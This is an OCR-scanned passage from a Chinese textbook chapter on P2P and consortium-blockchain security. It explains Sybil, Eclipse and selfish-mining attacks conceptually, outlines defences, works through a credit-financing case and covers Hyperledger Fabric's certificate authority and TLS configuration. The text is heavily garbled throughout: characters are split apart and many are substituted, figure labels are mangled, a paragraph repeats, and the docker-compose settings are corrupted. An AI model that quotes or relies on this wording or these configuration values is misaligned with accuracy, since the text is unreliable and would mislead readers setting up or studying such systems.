事实 上 ， 比 特 币 网 络 多 年 的 稳定 运行 也 证 明了 这 一 点 。 从 2009 年 1 月 比特 币 网 络 开始 运行 并 挖 出 创始 区 块 至 今 已 经 9 年 了 ， 无 数 的 黑客 希望 能 攻破 该 网 络 来 获得 巨额 的 经 济 收入 ， 但 是 这 个 系统 依然 稳 


定 地 运行 着 。 


5.2 ”客户 峭 与 节 氮 通信 和 名 密 (联盟 链 ) 


5.2.1 ”和 恶 意 客 户 问 作恶 方式 及 后 果 


恶意 客户 端 或 节点 可 以 从 应 用 层 、 覆 盖 层 和 网 络 层 3 个 层面 对 P2P 网 络 发 起 攻击 。 每 一 层 的 安全 都 依赖 于 下 一 层 提 供 的 保障 ， 应 用 层 的 安全 由 覆盖 层 来 保障 ， 覆 盖 层 的 安全 由 网 络 层 来 保障 。 
应 用 层 的 安全 漏洞 主要 来 自 于 应 用 程序 接口 。 

“ 覆盖 层 的 安全 威胁 主要 来 自 于 恶意 路 由 ， 当 P2P 网 络 中 覆盖 层 部 分 或 大 量 路 由 表 被 破坏 时 ， 建 立 在 敌 盖 层 之 上 的 应 用 层 的 功能 很 可 能 就 会 被 中 断 。 

网 络 层 的 安全 漏洞 主要 是 数据 包 的 拦截 、 纂 改 和 路 由 错误 等 。 


针对 P2P 网 络 应 用 层 ， 履 盖 层 和 网 络 层 攻击 类 型 如 图 5-1 所 示 。 


攻击 ”Eee 六 用 层 <、 ”服务 欺诈 、 资 源 消耗 、 
\ P2P 病 毒 等 


攻击 ”Eee》 覆盖 层 必 。 Sybil 攻击、 路 由 毒害 、 
DDoS 攻击 、Eclipse 攻 击 等 





网 络 层 ] IP 欺 骗 、 路 由 欺骗 、 
报 文 截取 、 报 文 算 改 等 





图 5-1 P2P 网 络 攻击 分 层 


与 其 他 的 一 些 应 用 程序 不 同 ，P2P 的 应 用 建立 在 覆盖 层 上 。 由 于 多 了 这 一 层 ， 也 引入 了 额外 的 攻击 层 。 假 设 履 盖 层 下 面 的 网 络 层 是 安全 可 靠 的 ， 那 么 恶意 客户 端 通过 对 履 盖 层 的 攻击 就 可 能 阻碍 P2P 系 
统 的 功能 。 以 下 介绍 两 类 P2P 网 络 中 比较 典型 的 覆盖 层 攻击 ， 以 及 衍生 出 来 的 相应 攻击 形式 。 


1.Sybil 攻 击 
公有 链 中 ， 在 没有 身份 认证 机 构 的 情况 下 ， 用 户 创建 新 身份 或 新 节点 是 不 需要 代价 的 ， 攻 击 者 可 以 很 容易 地 伪造 身份 加 入 网 络 ， 并 试图 去 获取 大 量 的 ID。 在 掌握 了 若干 节点 或 节点 身份 之 后 ， 他 们 可 
以 随意 做 出 一 些 恶 意 的 行为 ， 比 如 发 出 虚假 节点 加 入 请 求 消息 ， 误 导 节 点 之 间 正 确 路 由 来 降低 区 块 链 网 络 节点 查找 效率 ; 发 布 虚假 资源 或 是 故意 不 响应 请 求 来 消耗 节点 之 间 的 链接 资源 等 。 


图 5-2 演 示 了 在 比特 币 网 络 中 ， 大 量 的 Sybil 节 点 被 注入 到 网 络 中 。 这 些 节点 可 以 假冒 比特 币 的 全 节点 ， 故 意 不 响应 请 求 ， 使 得 其 他 节点 必须 为 此 等 待 ， 从 而 拖 慢 整个 区 块 链 网 络 的 速度 ; 而且 像 手机 钱 
包 这 种 SPV 节 点 ， 都 需要 通过 全 节点 才能 正常 收发 比特 币 ， 当 SPV 节 点 连接 到 这 种 假冒 的 全 节点 时 ， 它 们 就 无 法 正常 工作 了 。 


() 被 侵占 节点 () Sybil 节 点 


诚实 三 扩 








图 5-2 ”比特 币 网 络 中 Sybil 攻 击 示意 图 


2.Eclipse 攻 击 


这 种 攻击 通常 需要 Sybil 攻 击 的 配合 。 攻 击 者 通过 侵占 节点 的 路 由 表 ， 将 足够 多 的 虚假 节点 添加 到 某 些 节 点 的 邻居 节点 集合 中 ， 从 而 将 正常 节点 隔离 到 区 块 链 网 络 之 外 。 当 某 节 点 被 Eclipse 攻 击 时 ， 节 
点 的 大 部 分 对 外 路 由 都 会 被 控制 ， 然 后 屎 意 节 点 得 以 进一步 实施 路 由 欺骗 、 拒 绝 服 务 等 攻击 。Eclipse 攻 击 对 区 块 链 网 络 的 影响 非常 大 : 破坏 了 区 块 链 网 络 折 扑 的 完整 性 ， 亚 意 节 点 隔离 正常 节点 ， 导 致 网 
络 中 恶意 节点 增加 ， 正 常 节点 数量 下 降 ， 共 识 及 账本 同步 效率 大 大 降低 。 


Eclipse 除了 会 对 网 络 本 身 造 成 破坏 ， 攻 击 者 还 可 以 基于 Eclipse 攻击 ， 扩 展 出 以 下 的 攻击 。 


. 区 块 竞争 : 当 两 名 矿工 同时 发 现 区 块 时 就 会 发 生 区 块 竞争 ， 正 常 结果 是 一 个 区 块 被 写 入 区 块 链 ， 发 现 它 的 矿工 拿 到 区 块 奖励 ， 而 另 一 个 “ 孤 块 ”将 被 忽略 ， 发 现 它 的 矿工 不 会 得 到 挖 矿 奖 励 。 他 在 
可 以 通过 Eclipse 攻击 来 设计 区 块 竞赛 ， 他 在 侵蚀 大 量 矿工 节点 后 ， 一 旦 发 现 竞争 区 块 ， 就 将 “和 孤 块 ”广播 到 网 络 中 ， 那 些 被 Eclipse 攻击 的 节点 就 会 在 “ 孤 块 ”上 的 浪费 时 间 ， 从 而 导致 正常 区 块 无 法 及 时 
在 区 块 链 网 络 中 同步 。 


:自私 挖 矿 : 攻击 者 挖 到 一 个 新 块 后 ， 先 不 全 网 广播 而 是 私 藏 起 来 ， 而 其 余 的 矿工 还 在 卖力 地 继续 挖 矿 浪 费 算 力 ， 这 样 相当 于 攻击 者 在 挖 下 一 个 区 块 时 抢 跑 了 。 此 外 ， 攻 击 者 还 会 同时 监控 其 他 矿 
池 ， 当 预测 其 他 诚实 矿 池 挖 到 新 块 要 广播 时 ， 他 就 利用 被 Eclipse 攻击 的 节点 来 拖 慢 这 个 进程 ， 同 时 抢先 广播 他 所 私 藏 的 区 块 。 由 于 区 块 中 都 会 包含 时 间 崔 字段 ， 那 么 这 个 较 早 被 挖 出 来 的 块 便 会 被 网 络 所 
承认 。 


3. 总 结 


在 比特 币 这 样 的 公有 链 环境 中 ， 节 点 和 客户 端 加 入 是 没有 任何 限制 的 ， 所 以 攻击 者 很 容易 就 能 发 起 Sybil 攻 击 或 Eclipse 攻 击 。 然 而 这 些 攻击 以 及 衍生 出 来 的 区 块 竞争 攻击 或 自私 挖 矿 攻击 等 都 只 是 存在 
理论 上 的 可 能 性 ， 事 实 上 并 不 容易 操作 ， 也 不 符合 经 济 利益 。 大 部 分 矿工 加 入 网 络 除 了 支持 比特 币 网 络 的 友 展 ， 也 是 希望 能 获得 稳定 的 经 济 收入 。 如 果 某 人 上 肆意 地 攻击 网 络 ， 很 容易 造成 其 他 矿工 的 不 信 
任 ， 导致 别 的 矿工 不 愿意 再 验证 他 所 打包 的 区 块 。 


事实 上 ， 比 特 币 网 络 多 年 的 稳定 运行 也 证 明了 这 一 点 。 从 2009 年 1 月 比特 币 网 络 开始 运行 并 挖 出 创始 区 块 至 今 已 经 9 年 了 ， 无 数 的 黑客 希望 能 攻破 该 网 络 来 获得 巨额 的 经 济 收入 ， 但 是 这 个 系统 依然 稳 
定 地 运行 着 。 


5.2.2 ”P2P 网 络 安 全 机 制 | 


1. 加 密 和 认证 解决 方案 
如 果 对 P2P 网 络 中 传播 的 信息 进行 加 密 ， 攻 击 者 就 很 难 进 行 拦截 或 自 改 。 攻 击 者 就 算 获 取 到 信息 ， 也 难以 在 没有 正确 密 钥 的 情况 下 解密 信息 。 这 样 安 全 隐患 便 会 大 幅 减少 。 


通过 身份 认证 技术 来 识别 合法 节点 /客户 端 和 非法 节点 /客户 端 ， 可 以 阻止 非法 节点 或 客户 端 接 入 P2P 网 络 来 发 起 攻击 。 认 证 是 P2P 网 络 的 第 一 道 有 效 防线 ， 通 过 它 可 以 确保 节点 和 客户 端的 合法 性 以 及 
网 络 中 数据 的 真实 性 。 下 面 会 结合 Fabric 的 环境 搭建 来 看 一 下 Fabric 是 如 何 实现 加 密 及 认证 的 。 


2. 安 全 的 节点 ID 分 配方 案 

比较 直接 的 办 法 是 为 节点 ID 建立 一 个 集中 的 证 书 颁发 机 构 ， 由 机 构 来 发 行 ID 并 且 和 |P 地 址 绑 定 。 通 过 提高 节点 ID 的 可 信和 度 来 抵御 ID 劫持 攻 击 、Sybil 攻 击 等 。 

另 一 种 可 行 的 方案 是 分 布 式 节点 1D 绑 定 。 每 次 一 个 节点 接收 从 另 一 个 节点 发 来 的 特定 绑 定 请 求 <IP 地 址 ， 节 点 ID> ， 它 首先 根据 主键 一 一 |P 地 址 ， 在 共 覆 盖 层 去 查找 是 否 有 |P 地 址 相同 但 是 节点 ID 不 同 
的 绑 定 信息 ， 如 果 有 则 拒绝 这 条 请 求 ， 否 则 接受 这 条 请 求 (包含 查 不 到 绑 定 信息 或 是 查 到 完全 一 样 的 绑 定 信息 ) 。 


3. 安 全 路 由 表 维 护 


安全 路 由 是 P2P 网 络 有 效 运行 的 关键 环节 。 有 研究 者 提出 在 路 由 表 中 增加 元 余 项 ， 并 把 已 经 实施 了 强 有 力 约束 的 Nodeld 填 充 进 去 ， 来 增加 恶意 节点 占据 路 由 表 的 难度 。 同 时 也 提出 了 一 种 two- 
table (两 张 路 由 表 ) 的 解决 方案 ， 一 张 路 由 表 是 优化 路 由 表 ， 另 一 张 是 验证 路 由 表 。 通 常情 况 下 ， 节 点 优先 使 用 路 由 效率 相对 较 高 的 优化 路 由 表 进 行路 由 ， 在 路 由 检测 失败 的 时 候 则 依靠 验证 路 由 表 通 过 
安全 风 余 路 由 来 重新 进行 路 由 。 


5.2.3 ”联盟 链 如 何 确保 客户 端 和 节点 的 可 信任 


联盟 链 结合 了 公有 链 和 私有 链 的 应 用 场景 ， 它 既 可 以 提供 像 私 有 链 那样 的 数量 有 限 的 访问 节点 ， 又 能 实现 跨 领域 共享 ， 在 组 织 内 部 或 外 部 形成 一 个 公有 链 。 联 盟 链 探索 的 是 潜在 的 大 型 社区 之 间 的 数 


据 共 享 和 有 适当 限制 、 规 定 的 私有 区 块 链 。 比 如 2015 年 成 立 的 R3 联 盟 ， 旨 在 建立 银行 同业 间 的 联盟 链 。 通 带 每 个 银行 都 有 一 套 各 自 的 账本 ， 不 同 银行 间 的 结算 非常 复杂 。 在 银行 间 建 立 联盟 链 的 区 块 链 技 
术 可 以 使 多 个 银行 共享 同一 部 账本 ， 大 大 简化 了 银行 间 结 算 的 复杂 度 。 


性 
且 


虽说 公有 链 才 能 体现 区 块 链 的 真正 价值 ， 但 从 现 阶段 来 看 ， 商 业 价 值 的 体现 主要 还 是 在 联盟 链 上 。 从 行业 应 用 的 可 行 性 来 看 ， 联 盟 链 可 用 于 信用 登记 、 资 产 公 证 、 供 应 链 追 踪 、 物 联网 、 
等 ， 如 图 5-3 所 示 。 


ul 


\ 疹 及 


二 


供应 链 追 踪 
快递 物流 、 食 品 安 人 全、 生产线 














信用 登记 
征 信 系 统 、 信 息 披露 、 公 示 证 明 
物 联 网 


资 六 公证 
银行 、 保 险 、 证 券 、 互 联网 金融 、 
支付 机 构 、 各 类 交易 所 
助 资金 流 辣 、 互 助 保险 、 活 动 跟 踩 、 

、 审 计 部 门 、 企 业 管 理 


图 5-3 ”联盟 链 应 用 领域 


从 使 用 群体 上 来 看 ， 联 盟 链 的 参与 者 主要 集中 在 集团 企业 及 其 上 下 游 企业 、 银 行 、 证 券 公司 、 保 险 公司 等 。 目 前 越 来 越 多 的 公司 或 机 构 都 针对 联盟 链 做 了 很 多 有 意义 的 尝试 。 例 如 ， 在 2017 年 3 月 举 
办 的 超级 账本 (Hyperledger Fabric) 黑客 松 竞赛 中 ， 多 文 参赛 队 结合 实际 应 用 开发 出 很 多 有 实际 商业 价值 的 联盟 链 项 目 、 区 块 链 上 保单 质押 、 区 块 链 助力 二 手 车 交易 、 基 于 区 块 链 的 区 域 医疗 机 构 联盟 
链 及 电子 病历 服务 、 基 于 区 块 链 的 垂直 电 商 积分 共享 平台 、 去 中 心 化 的 小 型 包 囊 物 流 平 台 、 区 块 链 实现 慈善 事业 可 信任 和 透明 、 区 块 链 上 实现 信用 担保 融资 等 。 


其 中 也 不 乏 成 功 商 用 的 实际 案例 ， 比 如 杭州 复杂 美 科 技 已 经 为 多 家 大 型 集团 打造 了 基于 区 块 链 的 票据 应 用 平台 ， 实 现 了 供需 撮合 、 信 用 评级 、 分 布 式 监管 、 数 据 存 证 和 智能 交易 等 功能 。 


在 实际 的 商业 需求 中 ， 对 隐私 和 合 规 性 都 有 着 较 高 的 要 求 。 如 果 采 用 比特 币 这 种 完全 开放 式 的 公有 链 设 计 ， 那 么 势必 会 颠覆 目前 的 商业 模式 和 固有 利益 ， 商 业 群 体 需要 承担 极 大 的 风险 。 因 此 在 目前 
情况 下 ， 采 用 联盟 链 这 种 带 准 入 机 制 的 区 块 链 是 比较 好 的 选择 。 联 盟 链 只 针对 特定 的 群体 或 有 限 的 第 三 方 ， 并 且 提 供 准 入 机 制 ， 只 有 通过 认证 的 节点 或 客户 端 才 可 以 进入 ; 同时 提供 API 给 监管 或 第 三 方 ， 
使 其 拥有 查询 的 权限 。 


下 面 通过 一 个 授信 和 融资 的 实际 案例 ， 来 简要 分 析 一 下 联盟 链 中 如 何 确保 节点 和 客户 端的 安全 性 。 


1. 授 信和 融资 的 痛 点 


(1) 金融 机 构 


言 用 机 制 不 健全 ， 监 管 机 制 不 严谨， 获取 的 企业 真实 信息 不 完整 ， 很 容易 导致 对 企业 的 信用 评估 不 准确 ， 出 现 过 度 授 信 或 授信 不 足 的 情况 。 过 度 授信 和 是 指 授信 超出 借款 人 资产 负债 水 平 ， 容 易 发 生 资 
不 抵债 的 违约 风险 ;授信 不 足 是 指 实 际 贷款 额度 无 法 满足 借款 人 需求 ， 不 能 彻底 解决 企业 的 融资 问题 。 


(2) 核心 企业 


上 下 游 企业 众多 ， 对 于 每 家 企业 的 授信 额度 、 使 用 额度 、 剩 余额 度 等 数据 的 统计 、 维 护 成 本 较 高 。 对 于 上 下 游 企 业 的 每 笔 融 资 申请 ， 需 要 建立 在 真实 的 贸易 背景 下 ， 审 核 等 操作 记录 不 能 伪造 、 纂 
改 。 


2. 区 块 链 解决 的 问题 


1) 核心 企业 与 上 下 游 企业 将 其 贸易 记录 上 传 并 私 钥 签 名 ， 确 保 真实 的 贸易 背景 。 


2) 金融 机 构 可 通过 区 块 链 查询 融资 企业 的 累计 授信 ， 确 保 不 会 过 度 授信 或 授信 不 足 。 


3) 核心 企业 根据 金融 机 构 的 授信 额度 ， 申 请 发 行 等 额 的 授信 代 币 ， 便 于 统计 自己 的 担保 额 及 使 用 情况 。 


4) 上 下 游 企业 每 笔 融资 申请 ， 需 要 对 应 授信 代 币 来 交换 ， 确 保 不 会 出 现 内 部 管理 混乱 ， 随 意 放贷 。 


5) 贷款 记录 相关 信息 写 入 区 块 链 ， 可 作为 存 证 ， 用 于 日 后 的 违约 纠纷 处 理 。 


6) 上 下 游 企业 还 款 后 ， 通 过 授信 代 币 恢复 授信 人 额度， 即时 逐步 清算 统计 。 


7) 授信 代 币 可 设置 有 效 期 限 ， 便 于 一 段 时 间 后 对 企业 授信 额度 的 调整 。 


. 担保 方 : 大 型 集团 旗下 核心 企业 。 


融资 方 : 核心 企业 上 下 游 企 业 。 


. 贷款 方 : 银行 。 


4 .业务 流程 


我 们 先 来 看 下 业务 流程 ， 如 图 5-4 所 示 。 


融资 企业 在 核心 企业 的 信用 担保 下 ， 线 下 向 银行 申请 信用 贷款 额度 ， 银 行 评估 企业 状况 并 设 定 信 用 贷款 额度 。 


多 


DD 
— 


核心 企业 根据 银行 最 终 确 定 的 信用 贷款 额度 ， 在 区 块 链 平台 上 ( 线 上 ) 为 融资 企业 申请 等 额 的 授信 代 币 。 


3) 运营 方 审核 核心 企业 的 担保 授信 申请 ， 确 认 通 过 后 ， 将 等 额 的 授信 代 币 发 送 至 融资 企业 的 公 钼 地 址 . 
担保 方 ( 核心 企业 ) 
提供 担保 
回 平 侣 申请 授信 代 币 


= 和 


融资 方 (上 下 游 企业 ) 


申请 信 几 额度 


贷款 方 (银行 ) 区 块 链 平台 
记录 贸易 合同 信息 





确认 授信 和 额度 





记录 授信 和 信息， 
发 行 授信 代 币 


收 到 授信 代 吊 


币 请 信用 侣 钦 | 发 送 授信 代 员 [ 惠 核 担保 
区 得 贷 球 资金 
到 期 还 本 休息 } ‘ 


‘ 记录 还 款 信息 ， 
外 不 香 2 ， » 二 TD = ™ ey 
聊 复 信 用 额度 : 返还 授信 代 币 调整 授 人 言 额度 


记录 贷款 信息 


( 时 间 、 人 金额 、 


用 途 、 期 限 ) 





图 5-4 ”担保 融资 业务 流程 


4) 当 融 资 企业 需要 使 用 部 分 信用 额度 时 ， 人 在 平台 上 ( 线 上 ) 发 起 融资 申请 ， 然 后 将 对 应 贷款 额度 的 授信 代 币 友 送 至 核心 企业 公 钥 地 址 。 
5) 核心 企业 确认 贷款 信息 无 误 后 ， 线 下 提供 担保 ， 帮 助 融资 企业 从 贷款 银行 处 得 到 融资 资金 。 
6) 当 还 款 时 限 到 达 ， 融 资 企业 返还 本 息 给 贷款 银行 后 ， 核 心 企业 可 将 授信 代 币 返还 给 融资 企业 ， 用 于 下 次 的 信用 贫 款 。 

5. 区 块 链 网 络 结构 


这 是 一 个 由 集团 公司 总 部 、 核 心 企业 、 融 资 企业 以 及 银行 〈 目 前 情况 下 银行 那 边 不 部 署 共识 节点 ， 同 银行 的 交互 还 是 一 个 线 下 的 流程 ) 组 成 的 联盟 链 。 采 用 PBFT 协 议 ， 系 统 初始 化 时 部 署 4 个 物理 节 
点 ，1 台 在 集团 总 部 ， 另 外 3 台 在 任意 3 个 核心 企业 。 


6. 安 全 性 考虑 
(1) 用 户 账户 安全 问题 考虑 


用 户 必须 要 提供 强 有 力 的 身份 识别 证 明 (如 身份 证 号 ) 才能 注册 并 接 入 系统 。 系 统 需要 提供 账户 的 分 级 分 类 管理 (管理 员 权限 、 核 心 企业 权限 、 融 资 企业 权限 、 第 三 方 审 核 权 限 等 ) 。 例 如 ， 授 信 代 
币 只 有 系统 管理 员 才 有 权限 改行， 核心 企业 只 可 以 查看 并 处 理 与 其 相关 的 融资 企业 上 起 的 请 求 ， 融资 企业 只 能 查看 并 处 理 本 身 的 请 求 ， 对 于 第 三 方 ， 只 提供 其 相应 的 查看 权限 ， 不 提供 操作 权限 。 


(2) 客户 端的 安全 问题 考虑 


区 块 链 平台 支持 多 语言 版 本 (包括 Java 版 本 、Golang 版 本 和 Python 版 本 等 ) 客户 端的 接 入 。 客 户 端 包括 全 客户 端 (存储 所 有 交易 历史 记录 ) 、 轻 客户 端 (不 保存 所 有 交易 的 历史 记录 ) 和 网 页 客户 
端 (通过 网 页 浏览 第 三 方 服务 器 提供 的 服务 ) 。 


首先 ， 要 对 客户 端 提 供 准 入 机 制 ， 避 免 恶意 客户 端 进入 区 块 链 网 络 。 


其 次 ， 对 于 非 主 观 恶 意 客户 端 也 需要 加 强 审核 验证 。 目 前 区 块 链 系 统 的 一 致 性 达成 还 是 需要 客户 端的 支持 ， 如 果 客户 端 运行 中 出 现 异常 ， 或 是 存在 安全 漏洞 并 被 攻击 者 利用 ， 也 会 引起 拒绝 服务 问 
题 。 类 似 的 事件 在 以 太 坊 中 就 有 友 生 ， 以 太 坊 钱包 Geth 客 户 端 在 运行 过 程 中 的 内 存 问 题 引 友 了 客户 端 崩 演 ， 导 致 区 块 无 法 同步 ， 使 以 太 坊 代 币 价格 大 幅 下 跌 ; 以 太 坊 EXTCODESIZE 操 作 码 的 设计 漏洞 被 
攻击 者 利用 ， 并 发 起 DDoS 攻 击 ， 导 致 区 块 同步 时 间 变 长 。 


最 后 ， 在 客户 端 和 服务 器 端 之 间 建 立 安全 的 加 密 连 接 ， 加 密 数据 的 同时 也 能 有 效 地 防止 攻击 。 
(3) 节点 安全 问题 考虑 


上 述 区 块 链 平 台 使 用 的 是 PBFT 共 识 协议 ， 能 够 容忍 拜占庭 错误 。 考 虑 节点 安全 稳定 需要 考虑 非 拜 占 庭 错误 和 拜占庭 错误 两 方面 。 一 般 把 节点 由 于 本 身 故 障 或 网 络 延迟 中 断 导 致 的 不 响应 称 为 非 拜占庭 
错误 ， 这 种 情况 只 能 依赖 于 良好 的 硬件 和 网 络 环境 来 解决 ， 节 点 恶意 地 不 响应 或 故意 错误 地 响应 称 为 拜占庭 错误 (对 应 的 节点 称 为 拜占庭 节点 ) 。 节 点 加 入 区 块 链 网 络 成 为 共识 节点 需要 完成 为 以 下 几 个 
步骤 : 首先 ， 节 点 需要 经 过 认证 才 可 以 接 入 到 区 块 链 网 络 ， 这 时 只 能 作为 一 个 非 共 识 节 点 ， 只 同步 区 块 信息 但 不 参与 共识 ;其 次 ， 当 这 个 节点 同步 完 区 块 信息 (区 块 高 度 和 其 他 节点 一 致 ) 并 且 节 点 运行 
平稳 ， 再 将 它 从 非 共识 节点 更 新 为 共识 节点 ， 此 时 它 才 真 正 参与 区 块 共识 。 


(4) 实时 监控 和 预警 
区 块 链 系统 提供 监控 和 报警 功能 ， 比 如 系统 监测 到 某 节 点 的 区 块 高 度 和 其 他 节点 不 一 致 ， 或 是 某 节 点 长 时 间 响 应 超时 等 ， 能 够 主动 推送 报警 。 区 块 链 系统 支持 在 线 删 除 和 蔡 换 有 问题 的 节点 。 
(5) 惩罚 奖励 措施 


从 经 济 利益 上 着 手 ， 提 高 作 有 恶 的 成 本 。 比 如 节点 加 入 区 块 链 网 络 需 要 缴纳 一 定 的 保证 金 ， 如 果 节 点 作恶 ， 删 除 节点 的 同时 还 要 罚没 保证 金 。 


5.2.4 ”主流 联盟 链 通 信安 全 实现 误 析 
1.Hyperledger Fabric 安 全 实现 简 析 


(1) PKI 染 构 


Fabric 通 过 结合 用 户 和 角色 管理 来 保证 客户 端 应 用 和 节点 是 可 信任 的 。 身 份 管理 的 可 问 责 制 和 不 可 陷害 使 得 作恶 成 本 增加 ， 谁 胡作非为 都 是 可 追溯 的 并 需要 为 自己 的 行为 负责 。Fabric CA 是 
HyperLedger Fabric 的 证 书 颁发 机 构 ， 提 供 了 身份 注册 、 发 放 证 书 、 更 新 证 书 和 撤销 证 书 等 功能 。 它 采用 标准 的 PKI 架 构 ， 如 图 5-5 所 示 。 
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图 5-5 ”PKI 架构 
1) 根 证 书 颁 发 机 构 (Root CA) : CA 认证 中 心 给 自己 颁发 证 书 。 Root CA 是 PKI 层 次 结构 中 最 上 层 的 CA， 也 是 信任 链 的 起 始点 。 
2) 注册 证 书 颁发 机 构 (ECA) : 负责 给 通过 验证 的 用 户 颁发 注册 证 书 (ECerts) 。 
3) 交易 认证 中 心 (TCA) : 负责 给 提供 了 有 效 ECerts 的 用 户 颁 发 交易 证 书 (TCerts) 。 
4) TLS 证 书 颁发 机 构 (TLS-CA) : 负责 签发 允许 用 户 访问 其 网 络 的 TLS 证 书 和 凭证 。 利 用 证 书 来 认证 客户 和 服务 器 的 身份 。 
5) 注册 证 书 (ECerts) : 长 期 证 书 ， 被 颁发 给 所 有 的 角色 ， 如 用 户 、 非 验证 Peer、 验 证 Peer。 


6) 交易 证 书 (TCerts) : 每 笔 交 易 的 短期 证 书 ， 是 由 TCA 根 据 授权 的 用 户 请 求 颁 友 的 。 它 们 安全 地 给 一 个 交易 授权 ，TCert 可 以 配置 成 不 携带 用 户 的 身份 信息 。 它 们 使 得 用 户 不 仪 以 匿名 方式 参与 到 
系统 中 ， 而 且 阻 止 了 交易 之 间 的 关联 性 。 


(2) 用 户 / 客 户 端 /节点 注册 接 入 流程 
用 户 /客户 端 /节点 注册 接 入 流程 如 图 5-6 所 示 。 
@ 用 户 、 客 户 端 应 用 、 验 证 节点 / 非 验证 节点 在 线 下 将 身份 证 明 导 入 到 注册 机 构 。 


@ 注 册 机 构 返回 用 户 名 、 密 码 和 TLS-CA 证 书 给 注册 用 户 。 


离线 流程 
1. 注册 (里 份 证 明 ) 





hs 注册 (身份 证 明 ) 
gt ,TY dR -区 二 生生 Fabric-CA 
疾 验证 节点 2. 用 户 名 ， 密 码 ，TLS-CA 证 书 
在 线 流 程 


3. 用 户 请 求 注 册 到 系统 《用户 名 ， 冤 但 ) 


有 4. 发 送 注 册 请 求 
客户 训 发 送 注册 请 求 
6. 验证 证 书 
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10: 存储 证 书 到 本 地 ， 并 通知 用 户 






本 地 存储 
图 5-6 用户 /客户 端 /节点 注册 流程 
@ 用 户 连接 上 客户 庙 ， 发 送 上 一 步 拿 到 的 用 户 名 和 密码 给 客户 油 . 


@@ 客 户 端 发 送 包 含 注册 公 铜 和 用 户 名 、 密 码 等 附加 身份 信息 的 注册 请 求 到 Fabric-CA 的 注册 证 书 颁发 机 构 (ECA) 。 


@ECA 更 新 其 数据 库 来 标识 这 条 注册 信息 (用 户 名 、 密 码 ) 不 能 再 被 使 用 ， 然 后 构造 签名 并 返回 一 张 包含 用 户 注册 公 铀 的 注册 证 书 (ECert) 。 它 同样 会 发 送 ECA 证 书 (ECA-Cert) ， 在 下 面 的 流程 
中 会 见 到 。 


@ 客 户 端 验证 ECert 中 的 公 钥 是 客户 端 之 前 提交 的 ， 即 ECA 没 有 作 头 。 

@ 客 户 端 发 送 包 含 其 公 钥 和 身份 的 注册 信息 到 TLS-CA.。 

@TLS-CA 验 证 该 用 户 在 数据 库 中 是 否 真实 存在 。 然 后 TLS-CA 生 成 一 张 包含 用 户 TLS 公 钥 签 名 的 TLS-Cert。 

@ 客 户 端 验证 TLS Cert 中 的 公 钥 是 最 初 由 客户 端 提交 的 ，TLS Cert 中 的 信息 是 完整 且 形 式 正 确 的 。 

外 客户 端 在 本 地 存储 中 保存 Fabric-CA 生 成 的 所 有 证 书 (第 5 步 和 第 8 步 ) 。 至 此 ， 用 户 / 验 证 节点 / 非 验 证 节点 的 注册 就 完成 了 。 
(3) 结合 Fabric 环 境 搭 建 过 程 了 解 证 书 是 如 何 使 用 的 


先 大 概 介绍 一 下 需求 ， 有 4 家 银行 打算 组 成 一 个 联盟 ， 在 联盟 链 内 部 发 布 不 守信 客户 的 违约 数据 。 最 简单 的 网 络 拓扑 便 是 架设 1 个 Orderer 节 点 负责 排序 服务 ， 以 及 4 个 Peer 节 点 。 每 个 Peer 节 点 对 应 一 
家 银行 (在 此 称 之 为 一 个 组 织 ) 。 在 环境 搭建 之 前 ， 需 要 先 通 过 Fabric-CA 为 Orderer 组 织 以 及 4 家 银行 组 织 生 成 对 应 的 证 书 文件 。 


假设 文件 都 已 经 生成 完毕 ， 放 在 crypto 目 录 下 。 来 看 下 证 书 文 件 的 目录 结构 : 


[root@order]# tree -L 3 crypto 
crypto 
ordererOrganizations 
example.com 
Ca 
msp 
orderers 
tlsca 
users 
eerOrganizations 
orgl1 .example.com 











USeTS 


users 
org3 .example.com 


Ca 
msp 
peers 
tlsca 
users 


org4.example.com 


USeTS 


OrdererOrganizations 文 件 夹 中 存放 的 是 Orderer 排 序 服务 节点 所 用 到 的 证 书 及 用 户 实体 信息 ，PeerOrganizations 文 件 夹 中 存放 是 的 4 个 组 织 对 应 的 证 书 及 用 户 实体 信息 。 重 点 是 msp 目 录 ， 人 存放 了 
各 个 实体 对 应 的 身份 信息 。 在 运行 环境 之 前 ， 需 要 将 OrdererOrganizations 目 录 下 的 文件 复制 到 Orderer 节 点 相应 目录 下 ， 将 peerOrganizations 目 录 下 属于 当前 组 织 的 文件 复制 到 Peer 节点 相应 的 目录 
下 。 后 面 会 结合 配置 Fabric 启 动 参数 来 具体 说 明 。 


配置 Fabric Orderer 节 点 的 启动 参数 ， 编 辑 节 点 对 应 的 docker-compose 配 置 文件 ， 将 上 面 生 成 的 msp 和 tls 文 件 夹 复 制 到 节点 的 /vavVhyperledgerorderer 目 录 下 。 


volumes: 

- ./crypto-/ordererOrganizations/example.com/orderers/orderer.example.com/msp:/ 
var /hyperledger/orderer/msp 

- ./crypto/ordererOrganizations/example.com/orderers/orderer.example.com/tls/:/var/ 
hyperledger/orderer/tls 























Orderer 节 点 开启 TLS 功 能 ， 把 TLS 开 关 设 为 true， 指 定 tls 文 件 的 位 置 : 








'NERAL TLS ENABLED=true 

















N 

NERAL TLS PRIVATEKEY=/var/hyperledger/orderer/tls/server.key 
IN 
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NERAL TLS CERTIFICATE=/var/hyperledger/orderer/tls/server.crt 











| | 
OOoO0 
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NERAL TLS ROOTCAS=[/var/hyperledger/orderer/tls/ca.crt] 











中 定 Orderer 节 点 的 msp 文 件 位 置 : 





NERAL LOCALMSPID=OrdererMSP 
NERAT LOCAIMSPDIR=/var/hyperledger/orderer/msp 











px 
WW 
| 
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1 1 
od 























用 | 
办 
0) 
pa 








配置 Fabric Peer 节点 的 启动 参数 ， 编 辑 节点 对 应 的 docker-compose 配 置 文件 (4 个 节点 有 4 个 配置 文件 ， 这 里 只 介绍 peer0 的 配置 ， 其 余 节 点 配置 和 peer0 雷 同 ) ， 将 上 面 生成 的 msp 和 tls 文 件 夹 复 
制 到 节点 的 /var/hyperledger/fabric 目 录 下 。 


volumes: 

- ./crypto/peerOrganizations/orgl.example.com/peers/peer0 .orgl .example.com/msp:/etc/ 
hyperledger/fabric/msp 

- ./crypto/peerOrganizations/orgl.example.com/peers/peer0 .orgl .example.com/tls:/etc/ 
hyperledger/fabric/tls 















































Peer 节 点 开启 TLS 功 能 ,把 TLS 开 关 设 为 true， 指 定 tls 文 件 的 位 置 : 




















































































































— CORE PEER TLS ENABLED=true 

— CORE PEER TLS CERT FILE=/etc/hyperledger/fabric/tls/server.crt 
— CORE PEER TLS KEY FILE=/etc/hyperledger/fabric/tls/server.key 
